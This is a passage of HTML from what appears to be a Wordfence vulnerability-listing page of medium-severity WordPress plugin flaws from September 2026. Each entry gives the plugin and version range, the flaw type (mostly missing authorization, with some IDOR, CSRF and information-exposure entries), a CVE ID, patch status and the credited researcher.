<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/blog2social" target="_blank" rel="noopener">Blog2Social: Social Media Auto Post &amp; Scheduler</a> <span class="wfvr-software-slug">[blog2social]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/choriyev-qahramon" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4d8876b62aaa83428aafd305d0f556cc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4d8876b62aaa83428aafd305d0f556cc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/choriyev-qahramon" target="_blank" rel="noopener">Choriyev Qahramon</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1ff179fc-911d-4143-b2a2-5187d2aec67b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d7b01c00-a505-4df4-b1bb-3fcdf146f8e0" target="_blank" rel="noopener">Blog2Social: Social Media Auto Post &amp; Scheduler &lt;= 9.0.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89030" target="_blank" rel="noopener noreferrer">							CVE-2026-89030						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/blog2social" target="_blank" rel="noopener">Blog2Social: Social Media Auto Post &amp; Scheduler</a> <span class="wfvr-software-slug">[blog2social]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/choriyev-qahramon" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4d8876b62aaa83428aafd305d0f556cc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4d8876b62aaa83428aafd305d0f556cc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/choriyev-qahramon" target="_blank" rel="noopener">Choriyev Qahramon</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d7b01c00-a505-4df4-b1bb-3fcdf146f8e0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3f0188e3-4c81-472d-bd2f-902ccfb694b8" target="_blank" rel="noopener">Bookit &lt;= 2.6.0.4 &#8211; Authenticated (Bookit Staff+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89008" target="_blank" rel="noopener noreferrer">							CVE-2026-89008						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookit" target="_blank" rel="noopener">Bookit — Booking &amp; Appointment Calendar</a> <span class="wfvr-software-slug">[bookit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/378ee82a41d6ac71e897c1fb256f3e84.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="378ee82a41d6ac71e897c1fb256f3e84"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener">Farid Narimanov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3f0188e3-4c81-472d-bd2f-902ccfb694b8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d6d22ca-16bf-4f4d-a397-f2f8a035c2c0" target="_blank" rel="noopener">Bookit &lt;= 2.6.0.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89007" target="_blank" rel="noopener noreferrer">							CVE-2026-89007						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookit" target="_blank" rel="noopener">Bookit — Booking &amp; Appointment Calendar</a> <span class="wfvr-software-slug">[bookit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/trung-hieu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f16f92680f902826c363c531ea949a90.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f16f92680f902826c363c531ea949a90"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/trung-hieu" target="_blank" rel="noopener">Hieus</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d6d22ca-16bf-4f4d-a397-f2f8a035c2c0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b5e7edef-65c3-40ff-a773-13439c31f890" target="_blank" rel="noopener">Checkout Field Manager &lt;= 7.9.6 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87829" target="_blank" rel="noopener noreferrer">							CVE-2026-87829						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-checkout-manager" target="_blank" rel="noopener">Checkout Field Manager (Checkout Manager) for WooCommerce</a> <span class="wfvr-software-slug">[woocommerce-checkout-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/po-wei-ting-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/a4519363cef6c616216a8628cc67a9ff.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a4519363cef6c616216a8628cc67a9ff"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/po-wei-ting-2" target="_blank" rel="noopener">PO-WEI TING</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/open-information-security-inc" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7b4e26ad7157dc90de24d351d548e3c3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7b4e26ad7157dc90de24d351d548e3c3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/open-information-security-inc" target="_blank" rel="noopener">Open Information Security Inc</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b5e7edef-65c3-40ff-a773-13439c31f890" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/119835f0-6416-4161-8fd4-b876a566b8a4" target="_blank" rel="noopener">Checkout Field Manager &lt;= 7.9.6 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87831" target="_blank" rel="noopener noreferrer">							CVE-2026-87831						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-checkout-manager" target="_blank" rel="noopener">Checkout Field Manager (Checkout Manager) for WooCommerce</a> <span class="wfvr-software-slug">[woocommerce-checkout-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-moniruzzaman-prodhan-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/039118b396dab471df2ada3e4dc72d54.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="039118b396dab471df2ada3e4dc72d54"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-moniruzzaman-prodhan-2" target="_blank" rel="noopener">Md. Moniruzzaman Prodhan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/119835f0-6416-4161-8fd4-b876a566b8a4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e4260fd8-e634-4a11-9cf7-f0cb92fbbedb" target="_blank" rel="noopener">Comments Import &amp; Export 2.1.11 &#8211; 2.5.3 &#8211; Authenticated (Author+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87836" target="_blank" rel="noopener noreferrer">							CVE-2026-87836						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/comments-import-export-woocommerce" target="_blank" rel="noopener">Comments Import &amp; Export</a> <span class="wfvr-software-slug">[comments-import-export-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/a0yark" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f01b135d48b072ae23afe2e4156b8d99.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f01b135d48b072ae23afe2e4156b8d99"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/a0yark" target="_blank" rel="noopener">a0yark</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e4260fd8-e634-4a11-9cf7-f0cb92fbbedb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ad4884f6-27b1-4fed-b724-e14c0312d089" target="_blank" rel="noopener">Cooked – Recipe Management &lt;= 1.16.0 &#8211; Authenticated (Contributor+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73999" target="_blank" rel="noopener noreferrer">							CVE-2026-73999						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cooked" target="_blank" rel="noopener">Cooked – Recipe Management</a> <span class="wfvr-software-slug">[cooked]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nixxies" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/21afa6c796a1f23334897b28cd162f6c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="21afa6c796a1f23334897b28cd162f6c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nixxies" target="_blank" rel="noopener">Nixxies</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ad4884f6-27b1-4fed-b724-e14c0312d089" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c0ed27b8-dbdc-4927-8019-52a622bfbff6" target="_blank" rel="noopener">Datalogics Ecommerce Delivery &lt;= 2.6.65 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary Modification via Multiple AJAX Actions (datalogics_create_shipping / datalogics_cancel_shipping)</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-9613" target="_blank" rel="noopener noreferrer">							CVE-2026-9613						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/datalogics" target="_blank" rel="noopener">Datalogics Ecommerce Delivery – Datalogics</a> <span class="wfvr-software-slug">[datalogics]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benedictus-jovan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5ddf9d14fe3d5ebed8efd101f21a9e12.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5ddf9d14fe3d5ebed8efd101f21a9e12"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benedictus-jovan" target="_blank" rel="noopener">Benedictus Jovan (aillesiM)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c0ed27b8-dbdc-4927-8019-52a622bfbff6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a0a5259d-7340-48b5-a0cf-f68abdb21156" target="_blank" rel="noopener">Empik for Woocommerce &lt;= 1.5.1 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary Product Meta Update via empik_csv_process_emp_log_classes AJAX Action</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-9766" target="_blank" rel="noopener noreferrer">							CVE-2026-9766						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/empik-for-woocommerce" target="_blank" rel="noopener">Empik for Woocommerce</a> <span class="wfvr-software-slug">[empik-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benedictus-jovan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5ddf9d14fe3d5ebed8efd101f21a9e12.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5ddf9d14fe3d5ebed8efd101f21a9e12"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benedictus-jovan" target="_blank" rel="noopener">Benedictus Jovan (aillesiM)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a0a5259d-7340-48b5-a0cf-f68abdb21156" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/77b8b8f3-5cd3-4337-8010-04c5088f5994" target="_blank" rel="noopener">Event Booking Manager for WooCommerce &lt;= 5.5.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-91019" target="_blank" rel="noopener noreferrer">							CVE-2026-91019						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mage-eventpress" target="_blank" rel="noopener">Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar</a> <span class="wfvr-software-slug">[mage-eventpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/77b8b8f3-5cd3-4337-8010-04c5088f5994" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cb731e56-6962-4268-b248-f97d0c7e3bf4" target="_blank" rel="noopener">Eventin &lt;= 4.1.23 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84905" target="_blank" rel="noopener noreferrer">							CVE-2026-84905						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">Eventin – Events Calendar, Tickets, Registration, Booking &amp; WooCommerce</a> <span class="wfvr-software-slug">[wp-event-solution]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cb731e56-6962-4268-b248-f97d0c7e3bf4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fdc87b9f-8d58-4ffd-9b91-457ea3fb9f02" target="_blank" rel="noopener">Export &amp; Import WPBakery Page Builder &lt;= 1.0.2 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81429" target="_blank" rel="noopener noreferrer">							CVE-2026-81429						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vc-templates-import-export" target="_blank" rel="noopener">Export &amp; Import WPBakery Page Builder</a> <span class="wfvr-software-slug">[vc-templates-import-export]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/suhayb-ahmed" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c2dae9339cb7a7417b7eedcaf09ddf9e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c2dae9339cb7a7417b7eedcaf09ddf9e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/suhayb-ahmed" target="_blank" rel="noopener">Suhayb Ahmed</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fdc87b9f-8d58-4ffd-9b91-457ea3fb9f02" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f8f743a7-75f9-4789-b0e9-7f6b2f08a94a" target="_blank" rel="noopener">Filter Gallery &lt;= 1.1.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-90978" target="_blank" rel="noopener noreferrer">							CVE-2026-90978						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/filter-gallery" target="_blank" rel="noopener">Filter Gallery</a> <span class="wfvr-software-slug">[filter-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/seongwon-lee" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8e196345806e141d3c31b5b5d8489ec0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e196345806e141d3c31b5b5d8489ec0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/seongwon-lee" target="_blank" rel="noopener">Seongwon Lee</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f8f743a7-75f9-4789-b0e9-7f6b2f08a94a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/73577a0d-8aac-4369-8022-98c198f79224" target="_blank" rel="noopener">Filter Gallery &lt;= 1.1.4 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Modification via &#8216;image_id&#8217; Parameter via ufg_save_gallery AJAX Action</a></h4>
